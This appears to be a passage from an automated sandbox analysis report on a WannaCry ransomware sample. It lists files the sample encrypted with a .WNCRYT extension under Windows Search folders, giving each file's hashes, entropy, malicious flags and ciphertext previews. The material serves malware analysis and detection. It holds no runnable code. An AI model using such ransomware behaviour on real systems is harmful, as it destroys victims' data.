                                Reputation:unknown
                                Preview:WANACRY!.......g.~7..."[y+ ....Y.........Y._+..f6..M.).c...pg..3a..`i.....w.Sy......g....=...f.}...q.W=E....[.us9.c...eme....^.....@.@..L..{.K.:k.;...R...L..=..]n..d/.T../......[.+.i.Tu.......w..P....j..L79....5<......E.b+*@%.`..K.i.1....%c.....$....`Y......n.....]......k`.M.. .}..A^'.@.*8W[....E*........}.K$.X..._...!.40.e.~...A;.4kG.R..Sm.u..P.C.nJ.]b....dw.s.g..o...H9..'...1w.....2q..g.)Q.?...Z..WC.E..y.....v.~r.\3.3..._..=f.......w....(.C[!..S.....\L.j...1.r..c..Bw.h..8.;...a:v.C>|..\U<...9.3...PU.ba._..o.w..z..8.z...i"...3...C.<...,pL7...R.........t./.c.=.+.x..n.0.l$_..W.s..&.>../w...?s..Ype......f.,N..._.0..U..+D&...eZ..5.t.......h^.p...{.y.=&...#....(...m.rW@.8...$....EY....}s...........Eh..hc.9.A....V.a)s.I......T..z...(....6-Ti.;.<.qd=...;..}p.I.;l.c....+..sx{.:L.E._.Hs.....%.at}.........N.;<.y..'...I1..b.U....{......VO...v...7.C$.h......L.S...{........<=.O]X4.....yLd....!Z..X...r........&..u...d....Rd......4.....Jw.......$ir

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appssynonyms.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):243784
                                Entropy (8bit):7.999194677387297
                                Encrypted:true
                                SSDEEP:3072:aB0Hj5JoSXjYVWhQvC83CTwIL987q6pxL6IPV8Oyiz23yzKKv56upVzH2On0MAJI:FOXv0TwIpMq6nh/lh6QzLn0zJt0Q3m
                                MD5:ABA0733B2B79EE8B601A002350CD3988
                                SHA1:AB8C899ABF1EF874571FBB519845B4BF880FC05F
                                SHA-256:F2360EA81155A7680F460278D1FDF21E7E5F44503B6AD45BFEA2A28B14687259
                                SHA-512:6007CE8A7A8B5ACFC8A5C2A5BF84340F03CF6F07DE555832347ECEF341A6A3BCABE33CBA1B6237E6999ABAA6DF28E8A1C9691DB9A90A4EE9DDFC7AB9824BE7C5
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....v!i......5.5./..:!.2.....^]..?.]...p.u;5tn.u.?.[e..(.m.s;A....i;...x......-...W..i!y.U.g.....P.p.R....:....N.fb...T.........XE6J...UHe1.qJ6z.......F......AV.V,.....z....>......V.t;P...iN...9....,u}Y.soC^..;\...{.o.a1.p...}.x{)wl.'.wX.*2.b..'uM0{j..!.e....&........74.u.m...\V...I..+:.xc.5;c....v..c.....9..|.E...#[cS.Dc.~.........-.v..n]t..)r?..u.z.ES...._*.....K.>f.....-..."..+....*..i~E:.,...!2.......o..g..J..#......_..y3...1.+O...h.......qM......l*..sGj..!......!?.V.Sn.. .G..T<;"t.u...$7.........!.d...yy.F.cC..:3U.k\&zg...z......3...d.%..E.{|.Y .M.............s.&.\..Q.o$0...=.l..p.0y.`M....J..Y.Gc.(....5y...O.$..lFl:.^s...2. t.*.g!.g....X.......(...L.......u...x.*.%....n{....O.(..Br...s..G.@.+,4".E.... .+...a.%,t..A.....'WP./...u..Y...q...\..}o.....!......)Z.....pE....\....0....hY.../..'a..5F....N...{.....R.w3.![%....FF..g....M(_.z.........>!..:.x.G.O....`....Jc.........(..n..P..Qe.D....x..4....F....9..-..[.'e....+m.._.......I..e.\.

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsconversions.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):533032
                                Entropy (8bit):7.999659495897816
                                Encrypted:true
                                SSDEEP:12288:2yJwTAbdc+r0ZHgqe4zLVbaV3L0/nOLhNl3GRznk4:2yi+UgqtzLVeL0/O1Nka4
                                MD5:591B90F98D96219113149C2EFAB64AD6
                                SHA1:F774CE49278C2B1C1FE9CF02EECA8E7BDF0B071A
                                SHA-256:B5742BEA35E49904E26332B99DCCBC6D343A6723EE330DB8DCCB2757C2DCC44C
                                SHA-512:68DC2FFAC7A0BEE938BB0148A066190EE791AE83C40858B558B1731B371D65D23994251D76EA0FD58F57CBBE2CACCA97331DBAB776F2A8A47EE64B0C4FDD5E9C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....@.>..4.{..P..).b.[-7,...R.#.m.....eR.n..c.`..+..Rf.&..9.h..~.&..&.,f...eE....M.L."..Z..y..~...$%v.."z....j...,.x'..:.L)..-.......{..&.....Y.....W.A.dFi...I........@4.A..G!Ek.r.p.2.......?.....f..z....M(..4.....Z\..S[..6q=..X..r..M.}.......!.......6.......Vs..W.]..V.3..0....zz......?z..%.<...i.*.bG........... L.2..a.F..g.:.V@..+.Y< ././.7.M..Ll...y......;...QSz...,....'...(.Z1...".."...$.d...p...\..(.`..G.=.ij...".#..Q,..?.M..K2....N.....(.[hoo".0..}LF.......a.l.K.G.^]..b......H.6r'....].4A. ..-@bT%Z,..T..ja.\.ge.+._...C..6.z..|...F]Xzr)A..~...Zc..Jr.i.{......WIl...m..]....~....G..?..u!.N.)...`.P..A.:]X[.A.`.@R#.'BO..T........40..q.W%....>C....<rT{.,.*.....-......c.Ow....\..3P}..<AO.....+..n.3l.5.-...K.S.4G.*-..;.-7.r.....*.....7e.9ta..GpZ.].z].p.$.iW..t...............-5O.%.c...VFH....;...C>..v.t..E:t.wl.B.i.*.(.y...cr..X8....3F..}'.a..5.vp.7.&....s.%j.....e?....[@.B......WX.......9.....{0..^........v../....1.i.x..8c.n.(.)..m.

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsglobals.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):41416
                                Entropy (8bit):7.994988468993542
                                Encrypted:true
                                SSDEEP:768:3cTOxNi806JWLbi8sLWGRgCijcC8ff0hVgpc3CKiVhwjoKsCufbTROdz8FLwNayA:3nxND06qkP2CocC830h2pcR0ZLfbTRS2
                                MD5:1A187A2B1774759C4DFD6D69AD9009A3
                                SHA1:8A8165EEEE7531423E987266CC2633D56A70B0A4
                                SHA-256:86EBDABA82281471758265080FF1575524FE3D205AE1F87C7DB376F04E1D3F4B
                                SHA-512:8E072025B08128A9273B5963EB2F5EAA2F92D4422FB3388FD2F3E5E63CD865D7E3F33A8597159C12FACA9A5A540FD12B3E4831764433B01846A34FE61724B4ED
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......p.z...8.T..8.....S......2......;[yp.u6.}.9"V.^A.....vz.~.........%@....u;Y.BNh...\..oR. .4s..[..c1.k..l..8....nz....j.Q.LE.......s...F.C.jn...#!.<uh.....K.`...9.Z....+f...7[,:m.9....V.q+....t\.:.../....Wv.6..$0...v2.G.#..uQ.}.q..?...H}..A[p..............y....T.....t.H.l.u.|..h......[.}.tB..rRJO@....W..F..@.p...w....*......h..En..UR<.J.j..-b..2.J..37.......V.(.`..+.n.e).....L.lw.....4.....+I.T.-..O.ye..+.BA..xI$.BC..v.Nu..R.!d#..K.;{...+..Y.G=hf.ZQ.2....LIB....2......$.4.)R.1E.....b..L...>.Q..$W.Q]#)........~..6..[GF...$y..WQ...wv.&<g;......y.._+....y.S...\$D.........C...^..V:.....X......%.f..._.H...X.I_..."+...x.q...pa....M.,..H .-..Y.:#.&..%.0.z.s_?..#g...z|.-.0....N.+..1.4..1...\. e.|....<......v.`M5K..*MN%.?...M.l.8...+{5..i>`Q.%x...2...T.....w..l.....l..K.j....B.h.^..-?.....3...0.!i..w..r~E.Y....W.......$..:X'...#@{]>..E..a..p..g....U.....lu..Gd..E..VU.... ...]!....L%........v}...*<t.t......r+y..cO0....+.]x,...=.f/

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingssynonyms.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):104008
                                Entropy (8bit):7.997942678580585
                                Encrypted:true
                                SSDEEP:3072:GL3S8nOckclagXrWUx0hXPx0lA3/rp9ige:m3kclMUx09Px0aPTg
                                MD5:B305178CA17DD882E9DB6E7CAAE731EC
                                SHA1:D28177762AD36B122E171C948E2F8CD15CA327F3
                                SHA-256:192088425ED9EA531BED8FEC82CAD9D89766E099DF63122745638D3A7BF15936
                                SHA-512:F9A78EF68E24DA9F393A661B0BC6F78803D168A5DD759F8D6BEF6B3D400C07E9D1B56C2A4334CA10B780E07023CC99FFDFDBC4C5B5F46EDE26DE9E9F13962FBD
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......m}....M....".h..z......K$..V.E.).,?.3.... #......y....#.g.m......R(.....>....nk......}..8,#....p.d...*aq.....4.V....[.x>.......EkqN.-..:qH....pTO..P.a)5).....|3...-.R.#e.D...#(.pUH..v.M.c..P..o^.^}.5G.\.e...!...\..;.:.A....Ij....D.......2.<.g....%.......R ..C.b.-..Nu....\......J.s.\.).Gw..Y.].i.Ic.f6...f..n)C.C. ..*..@...E.y...x..."+.q...+R.....+K.c0( ..6..>.....W..]g...4..'..H..\;....bL.l.......[...5.z ...9..K.Se..a.bp.....GJ2J*...g....e..;M....!...|P._Ny..9.....F...1>.EF.#-.....CV.{.....'$..N#.....K.i.%.m.nuNS.,..~NeC(.....x.hA.........t......@..8.......k....k..f..O..hG4..@.n;>.r.`.....7.......7f..;3....%.....l....F).....e.F...P....Q.....\q.4[...u6..g.zF."B..Y..{..7.<...(..Em.hy,..W.q.>.N.`...'j"f........CnAE.j..9..{. pl....i.4.y..~kA38....U.D...6........C..\Epzs".....f.........j..>~BQL..dg....h..r%..U..Q....5=.[a\.~...-..(2...^,vb.).B.-..6.o....u...1..3.X...u.!.r.............<..;B....{...x...~.e.i.f..@Ji&.cR...9n.r...n.&.Z....

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d33fc00a-caf3-45c1-9fbf-c4db6e8b3d32}\0.0.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):214008
                                Entropy (8bit):7.999115649730841
                                Encrypted:true
                                SSDEEP:3072:In1xZ+e3Ktq8vmFtaOxEhC8dncApiqTVCjeS8vGa9xVTwOIMVrMx9VC69yogSI:I78+FtaOxyvNAqeetLrV8YG/UxT
                                MD5:0C806391C781CA24108D633DA53AD724
                                SHA1:1753FDA421478049A158F3169D61F267DA41272E
                                SHA-256:E1A5B3A39874138919F895AD7A8ABA7C8097C4B87A230EF55AFC461CDC7DD2F8
                                SHA-512:FBD8AF3B085844EE51551DA034A6CB7D8BF1E51715D243D337049209BD251F103C01CFA3D12F3E82A61133E11E570C65569D6C0FAB6E7D6DF7D5B07E01F93397
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....)!..:..-r=.v.W....>....`...a...LZ...X].j.....c.{.G..R....>../....U.YJ;u.'...Bj....Kpl).=......f.+.j..RD:......|.S....l.4+l.S.c>.7P.&.3..?..4.]f...+.s`.!..Q.qqD}.(...K...a.mr..=.%.*..xT.....g..G%.b$.S#....3.`........:EXR6...=..G:...9!FS.)....m.G......B..........a....6..z.....B..W.`.....v-..),vt....g....V...c4...2....K..).;..!.wV[J"..a.&......1T#.t}...8D.R5...VZ.[^.(.?.../.N+*7=+..|>D.....^dSa.Wl=0wM........M......N...~........N......iT..(.......~.T.!..E..m..=S&..m...<m2..Vv./yK.S.R~...(j.ae.......BF.K.g.E.....E.+.s....B'.(..Q.0.P.h....\g...L.....L.8...d......5..*..{..q:.5.Q.5n...#S..0.+.....jK..hN=mY..3sP$.,..G.s..n.@.C...0f.G....z..'.........s).\....<*......n%|...h..~&..{^%..;'..V...x.W.....LB.<..Ix...yt.B......Ufk..F#.k1...1......v...j..8.."!....^.R...>.............y..R......m."/yn..|.;.7n=.~d|.h.F.....m..%.0I..c3/p.Gom.M..C..a.9...D......9F.s......n.l{..T*f,X}Z. ..0..y.....@E>z]k.M.2xb.....?1Nu..3...Sv...kz`q2.l..Z.....z..d..!..

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d33fc00a-caf3-45c1-9fbf-c4db6e8b3d32}\0.1.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.09786583375337
                                Encrypted:false
                                SSDEEP:6:bkERrWjCxH50kLPtUIYMqtEscbU+VpsVI7F/yTqhDKOuY/Dt:bkEYOqkLPtZYrtVquGsTUDKB+t
                                MD5:D75A79CB6759DD3D31C990BB8F657490
                                SHA1:4279763CF53D4A6C1E9F499A1420EE5647EC0AE9
                                SHA-256:F6C8AA2F4D19A218709ABA5D54FF12398AFFCFAC9BC1E064D58449ED896B8281
                                SHA-512:FF9F7DFC0FEDBE9B9EAE3799EF33B2D22A618A2B757CC9FFB7A840B675D0D3FC6EB187BBEB20D960675768E4F6579814C178F18B69A1B58D374476738DBCCA08
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....].2.zS-.Nr..0.}....p.%_..E...5....e9.s.B..h.....WC7%/2Gf..SN.E*mp{....Er...S.."H.2. .*..+.] .'.r8..1p...>.B.....s...^h`...'{.}..hr.n.#Y......[...bq[...&Y03.}....<..[h....(...`O4..9..s.C.<.M7.X.....q8.[.I....#....(.O..."Y{.m.Z.-.I*...n*...mK...:......................<.=..

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d33fc00a-caf3-45c1-9fbf-c4db6e8b3d32}\0.2.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.2074684184520486
                                Encrypted:false
                                SSDEEP:6:bkExiszKbxCo8QmHWvkgUVREFrrim1mDIYw45jksopTDX0hGsT:bkEwmLb2vknREamsD+uksgEfT
                                MD5:55D5C3665574D94441BD4F6CF83D8169
                                SHA1:799620989F23216F184C444FCCB474A552EA71D0
                                SHA-256:3BE1842FD996D12AD0DE5A9B20A3D9EAA523C2236703BC3D030511C03C8DFB38
                                SHA-512:9FA247DF7F9F0D55AEC840F5153F3BC1FC67BD3276121AFDD60BBDCCA4DDC84BB1A4008E4E9571EE02165ADF2D8C06575DF9A5D3353EFAC8651D7CD48B9F2117
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....~...(.WE+N.p8}..u.%azg..3...0c.....{...S$byc......(...p.1..c..6E.P.Y5..Lu...C....U.Z]?..<@..CN.......3...v.2e.l..;-F...!...<...<$...R......~.d...@..O&...=<...F....../..1Q#.......C.P)I..u.J.j_.O..&&I.=%.t.U.`...)..P.kE..Cw......bl.q.*..Q..Y...D78..............K$Fd..)..9..f.

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):214008
                                Entropy (8bit):7.999118288275091
                                Encrypted:true
                                SSDEEP:3072:OEL+8IrOKOX/zWDQm7Y8G6YVViHbVWe8tgLWk4emlKxHXhGGi7kI6iDCU8hy0nM3:vK/Vf7Y8G/VVCZWHNl9i3hp4DCBYCA
                                MD5:C491AD13994FFF8A13F7F72403CD0337
                                SHA1:42D496FD32D18218EAD6DD5D5CE19AC0FBC687A4
                                SHA-256:199085E90AB4AD3403089C7E6D7F4FAB9005098D587E1BD0DE04DB901A13B486
                                SHA-512:E54B5102FD343DB95D0056DBB5FB2B8D35D7DD321DEE852B7D2C69B1B54F3301619906D2D7936CFED95C19C52D3214EA69844BB81FCB4AEC30A5DBFCB6614A83
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....#$".5........]..OGU..YN_M..X..hu....H.|...,.L.2.tM6F..R.....8.....t..z.......Y/.Ns}.f.}:P.........a....2R...6.....q-....E.,.|.A.Q/.r.B..$.....l(nkgXV(........"?.....+..l..Y.....N3s...yg..1......?...p..8`..v3^..@~:0.Q+.Xsb...yt..QY(j..r.L....F..`.......B........y..U._..~...G.t.E..d.SG.q....7O.zR.6..Nb...L..m.}.F&...&u,^..O..epF....x..8.x}..Vz...J.^..;2..,...~=...x.U..g...r..=.=.4OWE.. fJYh.".Z............/..o>.Q..........H...1....mpi...ud........F.....QL.1..r.m......,..8"s.tT...4.........o..$.t....3.t&l.S!2...%.....$0.G.....jW../_......n...Xv..5..*.....{...RC.....^@X@.n..`p-l.L:..obc.X.7...x}.....<..:....h..L..!....-v..l`w.x.3.`. ..A ...(.CD4._B......J....2}.S....d.[B.c.0dc./HB.m`.+ .+..n..i.}bt_.A!.4..6=.~..X.6#L.......e.4.j."s.D.....O.......&!.7..p....bd..~...8@..o.^ld..h.:....2Ln......w..!..~.}#J..3.$.....@..2.H..(........2s^.e....l.ZX.%...^q....ep..#x..6.3.a....a.. X|.K.}...(.@.O&7...8.g..F.6.)L.oi.A&mF....-l

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.1.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.112961092603951
                                Encrypted:false
                                SSDEEP:6:bkEX4pWCRGI3U9E9vAro3U5s4Uw9iamjqeYALJ4MDNIV7KX:bkElCMIUe9I8k64Utqe5dDm+
                                MD5:AE51FB844DC2E3A4CA5F26A45EFB46AB
                                SHA1:0D231A6B7666AD55FDE680987FD7995EEC239CE5
                                SHA-256:A68707281DA5C92A1DB5CCB77B8FA69C564CBB08A49CD849AD0400301E2EC9A5
                                SHA-512:62D7C3204E217A1F9593EBC3CFC5E4EE64BAEDA3FFDF01C982CA0B8AC90DB271A0DFBAEB602E3C1A16BA9BFAB4EC09BA2AE4C4757A540453E682D3FEDDC6928A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....d.R..sp.]........z..[...3'(..I."y..$.m-UW?.?.3.....#.[.qX...g......?..6~U..yk.<..O|.{Vx.6?I..k.....R.1.....%.....b3.Cj.3...J.j..<|yc..I1.Q9#...?........(/.U..@....R.5..ri..=.W.hNIMy<....y3...Y/...}..../.........,.'ep..).su.y...#*...o.....F...............gP;l`}B.._.;6

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.2.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.1783605738076375
                                Encrypted:false
                                SSDEEP:6:bkE/WEl5BW0pND3YqQENewjTq5pBpsjbpNQe4vtjod+6SYPAt8xyR2:bkEbvBDN3pRNhj2BexNQe0tG+6Mw02
                                MD5:BF768219075748E0FB9BBA9395534AE0
                                SHA1:A7E10D197E899AFB5CDD68F8E0820385953BA172
                                SHA-256:8DAF50688815187C042DA75F47E182470AE1EECE96BCF48971545C88F80C3B2C
                                SHA-512:82E3D87454CA230B0952C4C2268ABCDFADA9B4B13F90AC3DE5AABF4979C4CAB30D7683EEB52CEDB8611060260D39BB4AE2D6FF11C483AC9A8E527DC49DEAA5C3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....%D.....,..+.a.4.K..N.oa.e..&>WR...H..........k8.v.<yg.Qe...vV.!h..).t.9....4X.(.......C...(r...Y...\..O..3...<.mGN.t..U.../.M.s.]..O[......Z.N.).QyP.P.f..U.. ..E..H!4.M..{Z.X....(...............W...O...<..;._.A.....L.3y..0...H....gIf..3^.............4HQE$.w..o....S

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994707584058.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):115848
                                Entropy (8bit):7.998670002128212
                                Encrypted:true
                                SSDEEP:3072:vI31M64G72soF8dgIW9wIYU5w73/1DQGg:vI66F7ZdgT9PA/JJg
                                MD5:1874F47A8FEE610C0467190E67DBE79F
                                SHA1:2256FAB3FC2D076B31CE4682EA42D595ADA72680
                                SHA-256:1D3049F2C86EFE2F5AA2542D6C759D0E71F7C722B38DB704AAE1FEFC1A35DBDF
                                SHA-512:E0F095C6A72A06C4EF87CD57FA039A56ECE46FBE07C477004E38C2B0B71EF93350BF0C3B89CE0C5B1ADF01E083203C485E24E3A8DC065E058D229D6112D0B2A5
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.........%r.c=Y;~. .zr....)..#q..-'.. L].h.....y>..<H.L= ZG.V.....E.;.4L..p.FD...."....q2..Z.-+L..^.......}..v..w...r..U.I.p...K../b................\.;..v...I.N..C..b...A64...#h.. ..7.c.{....h.....^........i5.=.bN..s...t.3..._.A....T.y.@...&..\g.....j.......N...."....&].....s..s.X[J...%x9..DJ..x...)t.....'.....GI..6..7.......'.]5.i.I....&(...`...B....6..80..J.,.u.[..V,..dz&T....8...S.....D%..M.h.cg...P.P,...+.9.../..Y(..\..z..!...c..e...w....s.1.E..t.zo._...+.g.^....EN..''aP.&._\9....3.T....3..M.S.N...D=.]..B...{.......2...@. .5pT^...kae..PZ....p._... ..1I....O..;.o-...h..._..*...I..Nt.......2x..@.2..l....>.~.T..7u....g.v?Z.....N.B..... .n.@..+..R$..%.G...w..:..w...Z..Xp_v.....jI.:...S^.b.....g....o....i...JO.(.MzJb=h....1......j "..4.?0.k..AR\.`:..9T....u.].sz.L.P7....F.....Z.(_~.)..Y..y.e.......G"b.5+gu6.x'..f...z.Y.l.f`...<q..{_..!*w...?9a..P....H.T..;Xm..~...]N.{.7r.%.X.5j..._;R].'D4......RTH.S[.-E..?K.1....+O.......D...

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994802498611.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):115848
                                Entropy (8bit):7.9982652359642055
                                Encrypted:true
                                SSDEEP:3072:L0soBbw6edHW9sltkceFDYFlWDJy9QY7g2eJLcrKJt01Qof8l:LZi0R9kcCYmI9Q2eJLcktoc
                                MD5:42E33FE2EFCA4B88C6EF5EEBE2A24AAB
                                SHA1:39E495B891FFFE7F3946A38CBE3EB526B4B347B7
                                SHA-256:CF682CD928AA0BEE607467D0F4F4E2AFBAE85C56C986FBA5237990D5E94B5133
                                SHA-512:FA46CACB0195EFD14BB0A11114C191CB8F63D65D50737EE7FDE85E23F94A26D31EC4E88BAB915EF0F39F8C12080948EC34F9E7ADCB20965362C70F97C223226F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!........~.Z..-....{..9..d.a........Z....r.3O..6.2"....z-Cq...b.o"F|..-._.2.e%.......P...@.U....d....T.7....>`v..!`..Is"....r@.'O.(.C.....x..{..~{].cYud.6..#W...(......zO..{l..mT...5...G.8.@....q.F.......x.C.....aE...+.Bx:...5w....~.s.f.J....S...&....j.......h.b.M...Fg.Qr..O.7.J..'E...C...Qk.9.%5{MI.k....h.h..1..3...x.c:P.9.....!.FjOI.^`..b.m.o8..'...c..p.....s.R_D.8.G$.R.....sY./..z..A)9{.p....(..6o'...sR.f.HSY.,....^..U1......U".P...q4. ..l.....I...!_...#.[.Ol...7q...U.eiS......9MQI...2n..?I..b.....UC^<@.W6.......I...46m~....sJ.q.#..q.......VK...s..9.(.S...\.w.zj-......."_...kwP..@....m.. ...iz..3.....D..6..:.......%m.w..z......*oP<.h.`.4.M... b....G.._...L....n...M`N..5.{9;......Q8,.xS..q...u.......&4....B.n.,.g6.w.O8..T.d.wB...6.......M...8].+g......*]zi^'.F....wyy...(..(RQV.*..N .i{..."D.8..Wn..u2..9...y...n={.......L3.....<..:z....vP.+....0.!..;.S.?....y/.....3...B.#s....N.?.onK.......RyA.-..2.8.C..W.q.)......22.mr,?..4.{..

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196551589314323.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998126600039099
                                Encrypted:true
                                SSDEEP:3072:JjZcYM49fG0A6+AMpTfAzDh6ekxFM9U2cFsTHO:7cYM0X92wf8FMU2cFs6
                                MD5:F67034C9A704B69876DA4A5B39DD0170
                                SHA1:71E1868C83D677CC847A1422659A7208966AA728
                                SHA-256:8C61A7BF9C58D9ACC26428885311CA3D4A6AD6366AB93A20EDABCE01A1969D42
                                SHA-512:5EAB6385D464BDA7AA7530EA4887AFC32642A31436BBBE4114C97CBA23EF3E9679ADFA77ED33E033B0D08FC1CF9C00A12D0B5394C40AF6C3D0C1144DDAF73B8A
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......-L..<.w.q.......j3..C[.|....H...%...K/".*..w...].3..0..A..k..D.z...dI........z|.......`........j).}....m.S...'ZhI......:.|&o..)....U.\c.)..^A...W..C.}+...*s...M.....E..Y.q......aL...@..j.....O..|.Nd.Wnd.#.E.f..N..}..8.M.G'.x...o`...P#...O..............J..65.-]X..?f; ....uV."....W..='W).\.`D+l....bWQ......R...?...8......L*..zD.2.~..!."9.+a"69...r..Z.o..^..J>.....f3.(..}}...i.X..../.).......D..H.[........6{HO.Y...B/..3.(..{.^.3w..+..C.h...vg...7y8D0_.O.R.p.....v.{}....C.i..5.Q..l`.R...x.i..;'.w8...........Y.uy.3Z.Ydg<..........;a;.&,.....J.....m.i....eV.3.&vysX.K.q...."..]).1.......8.h..J..\..3...k.Lm..6..]....&...F..I.@^...f.P..<...O.....U/.'R-.)....gBL..Guj..[.. ..i/.....H....N..X...@Y....}...cfX...Z..uUs....z.....E..s1L...4..#)F/a...W......Qy..\~....nIiG....E).MJ.!*6...,I0..R..q.v...yH.....E.......R)...5...Q...sG.%.C...p~.....`.4....wR.1...G...N.;F..<..*...EB.|j.?......]K.5.........f.<.<.q$.....;J..i.@G...A..A.x#.l...(y..T.M

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196551879309585.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998502424640496
                                Encrypted:true
                                SSDEEP:1536:SkwxvndN11rj0cIa2T9KCfMfB6V19BZAf3q3gvaJ7D8oXPm+1gVXeXlmNWf1I1uX:SkyXIS2mB6L9ByWJ7DO+1gmlAY1+PgYk
                                MD5:4008F016AA1BE190FA1A788516C2C7E3
                                SHA1:E30B98E19EA91137FCEBF8D8C3046D80114325B1
                                SHA-256:9B66F2B460A2E874A34CA11A3139AD8C9CF458CBC10EF98C17C0322C06DEAB56
                                SHA-512:05B55F9CC7013372E6CE23D12E7C51EEB48A7F87A9495B9985E04C15E08C21F1754F8D77235BBF6290C2EEC686EAD42DD7BBE266E667D5DBB433D630591D3D47
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......i...I....+....hkR<.('#...8h!]..Y..z.D.B..F...=..W.vM.........Zc....D..^.X.Y.<.yb...C..~....b%R..f...$.e+[^w;....}..Q........q+6G#.d..V...&../.../.o.yc.44.e)r3.s..*F.....f.(.....~.6E..F`.|.....I.....g..&..6j 